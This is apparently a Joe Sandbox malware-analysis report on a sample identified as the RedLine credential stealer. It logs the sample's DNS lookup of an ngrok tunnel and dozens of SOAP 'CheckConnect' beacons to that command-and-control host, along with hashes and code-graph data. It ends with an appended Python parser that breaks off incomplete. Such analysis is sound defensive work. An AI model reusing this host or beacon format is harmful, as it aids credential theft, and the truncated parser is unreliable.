                                  Feb 17, 2024 20:43:44.074734926 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:44.075125933 CET4976317383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:44.347404003 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:44.347433090 CET17383497633.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.093497038 CET4976417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.365957022 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.366102934 CET4976417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.366439104 CET4976417383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.638921022 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.639648914 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.639691114 CET17383497643.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.641046047 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.917193890 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:49.917290926 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:49.917583942 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:50.193734884 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.193753958 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.193768978 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.193922997 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:50.194259882 CET4976517383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:50.470133066 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:50.470490932 CET17383497653.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.201044083 CET4976617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:55.475099087 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.475343943 CET4976617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:55.475730896 CET4976617383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:55.749507904 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.749536037 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.749552965 CET17383497663.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:55.750691891 CET4976717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:56.023344994 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:56.023469925 CET4976717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:56.023765087 CET4976717383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:43:56.296001911 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:56.296030998 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:43:56.296050072 CET17383497673.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.311908960 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.582617998 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.582786083 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.583507061 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.853809118 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.853853941 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.853914022 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:01.854099035 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:01.854218960 CET4976817383192.168.2.43.6.115.182
                                  Feb 17, 2024 20:44:02.124614000 CET17383497683.6.115.182192.168.2.4
                                  Feb 17, 2024 20:44:02.124789000 CET17383497683.6.115.182192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 17, 2024 20:42:01.658457994 CET | 49739 | 53 | 192.168.2.4 | 1.1.1.1
Feb 17, 2024 20:42:01.751817942 CET | 53 | 49739 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 17, 2024 20:42:01.658457994 CET | 192.168.2.4 | 1.1.1.1 | 0x991f | Standard query (0) | 0.tcp.in.ngrok.io | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 17, 2024 20:42:01.751817942 CET | 1.1.1.1 | 192.168.2.4 | 0x991f | No error (0) | 0.tcp.in.ngrok.io | | 3.6.115.182 | A (IP address) | IN (0x0001) | false
• 0.tcp.in.ngrok.io:17383

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49729 | 3.6.115.182 | 17383 | 7080 | C:\Users\user\Desktop\kuEfaZxkiY.exe

Timestamp | Bytes transferred | Direction | Data
Feb 17, 2024 20:42:02.091609955 CET | 244 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 0.tcp.in.ngrok.io:17383
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49730 | 3.6.115.182 | 17383 | 7080 | C:\Users\user\Desktop\kuEfaZxkiY.exe

Timestamp | Bytes transferred | Direction | Data
Feb 17, 2024 20:42:02.644577026 CET | 244 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Accept-Encoding: gzip, deflate
Host: 0.tcp.in.ngrok.io:17383
Content-Length: 137
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49731 | 3.6.115.182 | 17383 | 7080 | C:\Users\user\Desktop\kuEfaZxkiY.exe

Timestamp | Bytes transferred | Direction | Data
Feb 17, 2024 20:42:08.229341984 CET | 244 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 0.tcp.in.ngrok.io:17383
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49732 | 3.6.115.182 | 17383 | 7080 | C:\Users\user\Desktop\kuEfaZxkiY.exe

Timestamp | Bytes transferred | Direction | Data
Feb 17, 2024 20:42:08.787210941 CET | 244 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Accept-Encoding: gzip, deflate
Host: 0.tcp.in.ngrok.io:17383
Content-Length: 137
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49733 | 3.6.115.182 | 17383 | 7080 | C:\Users\user\Desktop\kuEfaZxkiY.exe

Timestamp | Bytes transferred | Direction | Data
Feb 17, 2024 20:42:14.347752094 CET | 244 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 0.tcp.in.ngrok.io:17383
Content-Length: 137
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49734 | 3.6.115.182 | 17383 | 7080 | C:\Users\user\Desktop\kuEfaZxkiY.exe

Timestamp | Bytes transferred | Direction | Data
Feb 17, 2024 20:42:14.897855997 CET | 244 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Accept-Encoding: gzip, deflate
Host: 0.tcp.in.ngrok.io:17383
Content-Length: 137
Expect: 100-continue
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49738 | 3.6.115.182 | 17383 | 7080 | C:\Users\user\Desktop\kuEfaZxkiY.exe

Timestamp | Bytes transferred | Direction | Data
Feb 17, 2024 20:42:20.463119030 CET | 244 | OUT | POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
Host: 0.tcp.in.ngrok.io:17383
Content-Length: 137
Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.4497403.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:21.013288975 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.4497423.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:26.588409901 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.4497433.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:32.146611929 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.4497443.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:37.716052055 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.4497453.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:38.276479006 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.4497463.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:43.836918116 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  13192.168.2.4497473.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:49.401427984 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  14192.168.2.4497483.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:54.959295988 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  15192.168.2.4497493.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:42:55.506906986 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  16192.168.2.4497513.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:01.066286087 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.4497523.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:01.615818977 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.4497533.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:08.468148947 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.4497543.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:13.756833076 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.4497553.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:19.329188108 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.4497563.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:19.891447067 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.4497573.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:25.459287882 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.4497583.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:26.007471085 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.4497593.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:31.574500084 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.4497603.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:32.126351118 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.4497613.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:37.681013107 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.4497623.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:38.236052036 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.4497633.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:43.802356005 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.4497643.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:49.366439104 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.4497653.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:49.917583942 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.4497663.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:55.475730896 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.4497673.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:43:56.023765087 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Accept-Encoding: gzip, deflate
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Connection: Keep-Alive


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.4497683.6.115.182173837080C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  TimestampBytes transferredDirectionData
                                  Feb 17, 2024 20:44:01.583507061 CET244OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                  Host: 0.tcp.in.ngrok.io:17383
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Connection: Keep-Alive


                                  Target ID:0
                                  Start time:20:41:59
                                  Start date:17/02/2024
                                  Path:C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\kuEfaZxkiY.exe
                                  Imagebase:0x860000
                                  File size:97'792 bytes
                                  MD5 hash:117EEF8A227E6CE3646718D0ED6FB7B1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                  Reputation:low
                                  Has exited:false

                                  Target ID:1
                                  Start time:20:41:59
                                  Start date:17/02/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:12.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:16
                                    Total number of Limit Nodes:0
Execution graph (rendered graph omitted; the 16 nodes and their edges, recovered from the node list): 0xF90871 branches to 0xF908D8 or 0xF908C8, both of which reach 0xF908FA; 0xF908FA branches to 0xF90CE8 or 0xF90CE0, each of which leads into 0xF90D26 (the GetConsoleWindow call) and on to 0xF90D56; from there control returns through 0xF9093E to 0xF90889.

                                    Control-flow Graph

Control-flow graph of the function at 0xF9E7B0 (rendered graph omitted; executed and not-executed blocks were colour-coded in the original). Basic blocks span 0xF9E7B0 to 0xF9F831 and the function calls 0xF9D8F8 (several sites), 0xF9CD58 and 0xF9CC20; the block-level edge list is not reproduced here.
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5a34045b10357486b77e8122061f21b6364bf195793d241e51ec78ba2e713b85
                                    • Instruction ID: 1600c15ea2e7c60ca5d01d2e95b6ed81fd9e9a15cc3aa863651fae39670fb33c
                                    • Opcode Fuzzy Hash: 5a34045b10357486b77e8122061f21b6364bf195793d241e51ec78ba2e713b85
                                    • Instruction Fuzzy Hash: 7482E834B002588FDB14DF68D899B6DBBB2BF88310F1184A9E50A9B3A5DF309D85DF50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph
                                    • Rendered graph omitted. Function at 0x00F90CE0, three blocks: 0x00F90CE0-0x00F90D54 (calls GetConsoleWindow) branches either to 0x00F90D56-0x00F90D5C or directly to 0x00F90D5D-0x00F90D82, where both paths rejoin.
                                    APIs
                                    • GetConsoleWindow.KERNELBASE ref: 00F90D47
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2945720828.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f90000_kuEfaZxkiY.jbxd
                                    Similarity
                                    • API ID: ConsoleWindow
                                    • String ID:
                                    • API String ID: 2863861424-0
                                    • Opcode ID: 002d8aa482b39637895e7609670617d9e7ec69545f1a3e85a30dadceca6a1f4e
                                    • Instruction ID: ce0d615bad46c29791f4a83904ecf792ec2048a6747fdf7177c2aa2d4ae52873
                                    • Opcode Fuzzy Hash: 002d8aa482b39637895e7609670617d9e7ec69545f1a3e85a30dadceca6a1f4e
                                    • Instruction Fuzzy Hash: 881136B1D002498FDB20DFAAC8457DEFFF0AF88324F24842AC459A7250CB79A544CF94
                                    Uniqueness

                                    Uniqueness Score: -1.00%
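                                    The control_flow_graph lines in this report are the text the IDA plugin's rendered graph flattens to. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses such a dump into blocks and edges and summarises entry and exit blocks, call targets and API references for quick triage, and lists blocks no entry block reaches. The token grammar (`<id> <start>[-<end>] [call <addr> | ApiName]` for a block, `<id>-><id>` for an edge) is inferred from the dumps on this page and is an assumption, not a documented format. The two sample dumps are copied from this page: the GetConsoleWindow function in full and a three-block excerpt of the first function.

```python
"""Parse Joe Sandbox textual control-flow-graph dumps and summarise them.

Token grammar (inferred from the dumps on this page; an assumption):
  control_flow_graph                        optional leading keyword
  <id> <start>[-<end>] [annotation ...]     basic block, hex addresses,
                                            annotations 'call <addr>' or an API name
  <id>-><id>                                flow edge between two blocks
"""
import re
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ID_RE = re.compile(r"^\d+$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")


@dataclass
class Block:
    node_id: int
    start: int
    end: int
    annotations: list = field(default_factory=list)


@dataclass
class Cfg:
    blocks: dict   # node_id -> Block
    edges: list    # (src_id, dst_id)


def parse_cfg(text: str) -> Cfg:
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges = {}, []
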